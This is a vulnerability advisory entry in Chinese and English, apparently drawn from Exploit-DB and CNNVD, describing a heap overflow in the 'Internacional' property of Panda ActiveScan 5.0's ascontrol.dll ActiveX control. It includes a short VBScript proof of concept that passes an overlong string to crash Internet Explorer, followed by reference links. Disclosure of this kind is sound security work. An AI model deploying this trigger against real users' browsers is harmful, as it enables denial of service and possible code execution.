https://www.exploit-db.com/exploits/23917
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-733

PandaActiveScan5.0版本的ascontrol.dll存在缓冲区溢出漏洞。远程攻击者借助后缀超长字符串的Internacionalproperty执行任意代码。

source: http://www.securityfocus.com/bid/10065/info

It has been reported that Panda ActiveScan may be prone to a remote heap overflow vulnerability that may allow an attacker to cause a denial of service condition in Internet Explorer or leverage the issue to execute arbitrary code.

The issue is reported to exist in the 'ascontrol.dll' file, specifically the 'Internacional' property of the 'ReportHebrew' object is identified as vulnerable.

Panda ActiveScan 5.0 has been reported to be prone to this issue. 

<script language=vbscript>
dim mymy
Set mymy = CreateObject("ASControl.ReportHebrew.1" )

a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
mymy.Internacional a
</script>

来源:XF
名称:panda-activescan-ascontrol-bo(15764)
链接:http://xforce.iss.net/xforce/xfdb/15764
来源:BID
名称:10065
链接:http://www.securityfocus.com/bid/10065
来源:theinsider.deep-ice.com
链接:http://theinsider.deep-ice.com/texts/advisory53.txt
来源:SECUNIA
名称:11312
链接:http://secunia.com/advisories/11312
来源:BUGTRAQ
名称:20040406PandaActiveScan5.0-RemoteBufferOverflowandACrash(D.O.S)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108130573130482&w;=2